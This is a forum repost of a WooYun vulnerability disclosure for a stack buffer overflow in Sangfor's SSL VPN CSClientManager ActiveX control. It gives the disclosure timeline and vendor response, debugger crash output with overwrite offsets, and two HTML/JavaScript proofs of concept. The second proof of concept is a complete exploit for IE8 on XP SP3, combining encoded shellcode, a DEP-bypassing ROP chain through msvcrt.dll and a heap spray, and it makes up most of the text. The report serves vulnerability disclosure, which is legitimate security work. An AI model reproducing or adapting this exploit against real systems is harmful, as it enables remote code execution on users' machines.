Board logo

标题: 深信服SSLVPN漏洞 #4 Sangfor CSClientManager Activex Remote Code Execution [打印本页]

作者: linda    时间: 2014-12-29 16:42     标题: 深信服SSLVPN漏洞 #4 Sangfor CSClientManager Activex Remote Code Execution

漏洞概要
缺陷编号:        WooYun-2013-43078
漏洞标题:        #4 Sangfor CSClientManager Activex Remote Code Execution bypass dep on ie8
相关厂商:        深信服
漏洞作者:        想要减肥的胖纸
提交时间:        2013-11-16 17:00
公开时间:        2014-02-14 17:01
漏洞类型:        远程代码执行
危害等级:        高
自评Rank:        15
漏洞状态:        厂商已经确认
漏洞来源:        http://www.wooyun.org
Tags标签:       远程代码执行 activex漏洞

漏洞详情披露状态:
2013-11-16:        细节已通知厂商并且等待厂商处理中
2013-11-18:        厂商已经确认,细节仅向厂商公开
2013-11-21:        细节向第三方安全合作伙伴开放
2013-11-28:        细节向核心白帽子及相关领域专家公开
2013-12-08:        细节向普通白帽子公开
2013-12-28:        细节向实习白帽子公开
2014-02-14:        细节向公众公开

简要描述:[+] Looking for cyclic pattern in memory
Cyclic pattern (normal) found at 0x03750630 (length 1000 bytes)
Cyclic pattern (normal) found at 0x03750e66 (length 1000 bytes)
Cyclic pattern (normal) found at 0x03df203d (length 1000 bytes)
Cyclic pattern (normal) found at 0x03e54d1d (length 1000 bytes)
Cyclic pattern (normal) found at 0x016ad0ee (length 1000 bytes)
Cyclic pattern (unicode) found at 0x03745da4 (length 252 bytes)
Cyclic pattern (unicode) found at 0x03747e38 (length 1996 bytes)
Cyclic pattern (unicode) found at 0x03748d2e (length 999 bytes)
Cyclic pattern (unicode) found at 0x0407063a (length 999 bytes)
Cyclic pattern (unicode) found at 0x040c6236 (length 999 bytes)
Cyclic pattern (unicode) found at 0x040c6a64 (length 1996 bytes)
Cyclic pattern (unicode) found at 0x03e09bce (length 999 bytes)
EIP overwritten with normal pattern : 0x67413367 (offset 190)
ESP (0x016ad1b4) points at offset 198 in normal pattern (length 802)
EBP (0x016ad1ec) points at offset 254 in normal pattern (length 746)
[+] Examining SEH chain

SEH record (nseh field) at 0x016ad1c4 overwritten with normal pattern : 0x33684132 (offset 214), followed by 782 bytes of cyclic data


详细说明:该漏洞控件源自深信服官方渠道登录,请对其升级,看版本应该是新版的?6.0,之前的漏洞是4.X版本的


code 区域名称:         CSClientManager Class
发行者:        Sangfor Technologies Co.,Ltd
类型:         ActiveX 控件
版本:         6. 0. 0. 0
文件日期:      
上次访问日期:     2013年11月16日,14:51
类 ID:       {D257CF85-8E97-4C9B-8407-459B28006000}
使用计数:       118
阻止次数:       0
文件:         CSClientManagerPrj.dll
文件夹:        C:\Program Files\Sangfor\SSL\ClientComponent3
code 区域[+] Looking for cyclic pattern in memory
    Cyclic pattern (normal) found at 0x03750630 (length 1000 bytes)
    Cyclic pattern (normal) found at 0x03750e66 (length 1000 bytes)
    Cyclic pattern (normal) found at 0x03df203d (length 1000 bytes)
    Cyclic pattern (normal) found at 0x03e54d1d (length 1000 bytes)
    Cyclic pattern (normal) found at 0x016ad0ee (length 1000 bytes)
    Cyclic pattern (unicode) found at 0x03745da4 (length 252 bytes)
    Cyclic pattern (unicode) found at 0x03747e38 (length 1996 bytes)
    Cyclic pattern (unicode) found at 0x03748d2e (length 999 bytes)
    Cyclic pattern (unicode) found at 0x0407063a (length 999 bytes)
    Cyclic pattern (unicode) found at 0x040c6236 (length 999 bytes)
    Cyclic pattern (unicode) found at 0x040c6a64 (length 1996 bytes)
    Cyclic pattern (unicode) found at 0x03e09bce (length 999 bytes)
    EIP overwritten with normal pattern : 0x67413367 (offset 190)
    ESP (0x016ad1b4) points at offset 198 in normal pattern (length 802)
    EBP (0x016ad1ec) points at offset 254 in normal pattern (length 746)
[+] Examining SEH chain

    SEH record (nseh field) at 0x016ad1c4 overwritten with normal pattern : 0x33684132 (offset 214), followed by 782 bytes of cyclic data


漏洞证明:
code 区域<html>
<object classid='clsid257CF85-8E97-4C9B-8407-459B28006000' id='target' ></object>

<script >

junk1 = "";
while(junk1.length < 190) junk1+="A";
eip = "BBBB";
junk2 = "CCCCCCCCCCCCCCCCCCCC";
nseh = "DDDD";  

seh ="EEEE";  

junk3 = "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF";
payload = junk1 + eip + junk2 + nseh + seh + junk3;

target.checkRelogin(payload);

</script>
</html>







test on win xp spy ie8



rop bypass dep




code 区域<html>
<head>
    <title>Sangfor Activex stack overflow PoC bypass dep on xpsp3 ie8</title>
</head>
<body>
<!--[+] Looking for cyclic pattern in memory
    Cyclic pattern (normal) found at 0x03710440 (length 1000 bytes)
    Cyclic pattern (normal) found at 0x03710c76 (length 1000 bytes)
    Cyclic pattern (normal) found at 0x00188a88 (length 16 bytes)
    Cyclic pattern (normal) found at 0x03dedc28 (length 1000 bytes)
    Cyclic pattern (normal) found at 0x03e52d10 (length 1000 bytes)
    Cyclic pattern (normal) found at 0x016ad0ee (length 1000 bytes)
    Cyclic pattern (unicode) found at 0x0409d632 (length 999 bytes)
    Cyclic pattern (unicode) found at 0x040d6236 (length 999 bytes)
    Cyclic pattern (unicode) found at 0x040d6a64 (length 1996 bytes)
    Cyclic pattern (unicode) found at 0x03705d6c (length 252 bytes)
    Cyclic pattern (unicode) found at 0x03707e00 (length 1996 bytes)
    Cyclic pattern (unicode) found at 0x03708cf6 (length 999 bytes)
    Cyclic pattern (unicode) found at 0x03e05fb4 (length 999 bytes)
    EIP overwritten with normal pattern : 0x67413367 (offset 190)
    ESP (0x016ad1b4) points at offset 198 in normal pattern (length 802)
    EBP (0x016ad1ec) points at offset 254 in normal pattern (length 746)
[+] Examining SEH chain

    SEH record (nseh field) at 0x016ad1c4 overwritten with normal pattern : 0x33684132 (offset 214), followed by 782 bytes of cyclic data
[+] Examining stack (entire stack) - looking for cyclic pattern
    Walking stack from 0x0168f000 to 0x016afffc (0x00020ffc bytes)
    0x016ad0f0 : Contains normal cyclic pattern at ESP-0xc4 (-196) : offset 2, length 998 (-> 0x016ad4d5 : ESP+0x322)
-->
    <object classid="clsid257CF85-8E97-4C9B-8407-459B28006000" id='poc'></object>
    <script>
                // [ Shellcode ]
                var shellcode = unescape('%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063');
                var rop_chain = //"\uBE4C\u77BE" + // 0x77BEBE4C        # retn [msvcrt.dll]
                       // "\uBE4B\u77BE" + // 0x77BEBE4B        # pop ebp # retn [msvcrt.dll]
                       // "\u5ED5\u77BE" + // 0x77BE5ED5        # xchg eax, esp # retn [msvcrt.dll]
                       // "\uBE4C\u77BE" + // 0x77BEBE4C        # retn [msvcrt.dll]
                       // "\uBE4C\u77BE" + // 0x77BEBE4C        # retn [msvcrt.dll]
                       // "\uBE4C\u77BE" + // 0x77BEBE4C        # retn [msvcrt.dll]
                      //  "\uBE4C\u77BE" + // 0x77BEBE4C        # retn [msvcrt.dll]
                        // The real rop chain
                        "\ube4b\u77be" + // 0x77bebe4b : ,# POP EBP # RETN [msvcrt.dll]
                        "\ube4b\u77be" + // 0x77bebe4b : ,# skip 4 bytes [msvcrt.dll]
                        "\u6e9d\u77c1" + // 0x77c16e9d : ,# POP EBX # RETN [msvcrt.dll]
                        "\uE000\u0000" + // 0x0000E000 : ,# 0x0000E000-> ebx [dwSize]
                        "\ucdec\u77c1" + // 0x77c1cdec : ,# POP EDX # RETN [msvcrt.dll]
                        "\u0040\u0000" + // 0x00000040 : ,# 0x00000040-> edx
                        "\u79da\u77bf" + // 0x77bf79da : ,# POP ECX # RETN [msvcrt.dll]
                        "\uf67e\u77c2" + // 0x77c2f67e : ,# &Writable location [msvcrt.dll]
                        "\uaf6b\u77c0" + // 0x77c0af6b : ,# POP EDI # RETN [msvcrt.dll]
                        "\u9f92\u77c0" + // 0x77c09f92 : ,# RETN (ROP NOP) [msvcrt.dll]
                        "\u6f5a\u77c1" + // 0x77c16f5a : ,# POP ESI # RETN [msvcrt.dll]
                        "\uaacc\u77bf" + // 0x77bfaacc : ,# JMP [EAX] [msvcrt.dll]
                        "\u289b\u77c2" + // 0x77c2289b : ,# POP EAX # RETN [msvcrt.dll]
                        "\u1131\u77be" + // 0x77BE1131 : ,# ptr to &VirtualProtect() [IAT msvcrt.dll] 0x20-0xEF=0x31
                        "\u67f0\u77c2" + // 0x77c267f0 : ,# PUSHAD # ADD AL,0EF # RETN [msvcrt.dll]
                        "\u1025\u77c2";  // 0x77c21025 : ,# ptr to 'push esp #  ret ' [msvcrt.dll]
                // [ fill the heap with 0x0c0c0c0c ] About 0x2000 Bytes
                var fill = "\u0c0c\u0c0c";
                while (fill.length < 0x1000){
                        fill += fill;
                }
                // [ padding offset ]
                padding = fill.substring(0, 0x5F6);
                // [ fill each chunk with 0x1000 bytes ]
                evilcode = padding + rop_chain + shellcode + fill.substring(0, 0x800 - padding.length - rop_chain.length - shellcode.length);
                // [ repeat the block to 512KB ]
                while (evilcode.length < 0x40000){
                        evilcode += evilcode;
                }
                // [ substring(2, 0x40000 - 0x21) - XP SP3 + IE8 ]
                var block = evilcode.substring(2, 0x40000 - 0x21);
                // [ Allocate 200 MB ]
                var slide = new Array();
                for (var i = 0; i < 400; i++){
                        slide = block.substring(0, block.length);
                }
var junk = '';
while(junk.length<190) junk += 'A';
popeax = "\x28\x7b\x71\x7d";// 0x7d717b28  {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.6242 (C:\WINDOWS\system32\SHELL32.dll)
xchg = "\x79\x68\x44\x3e"; //0x3e446879 {PAGE_EXECUTE_READ} [WININET.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v8.00.6001.19394 (C:\WINDOWS\system32\WININET.dll)
str = "\x0c\x0c\x0c\x0c";
payload = junk + popeax + str +str +xchg;
poc.checkRelogin(payload);   
    </script>
</body>
</html>


修复方案:
版权声明:转载请注明来源 想要减肥的胖纸@乌云

漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2013-11-18 16:53
厂商回复:
最新状态:暂无

原文:http://www.wooyun.org/bugs/wooyun-2013-043078

[ 本帖最后由 linda 于 2016-2-3 18:32 编辑 ]




欢迎光临 中神通公司技术论坛 (http://trustcomputing.com.cn/bbs/) Powered by Discuz! 6.0.0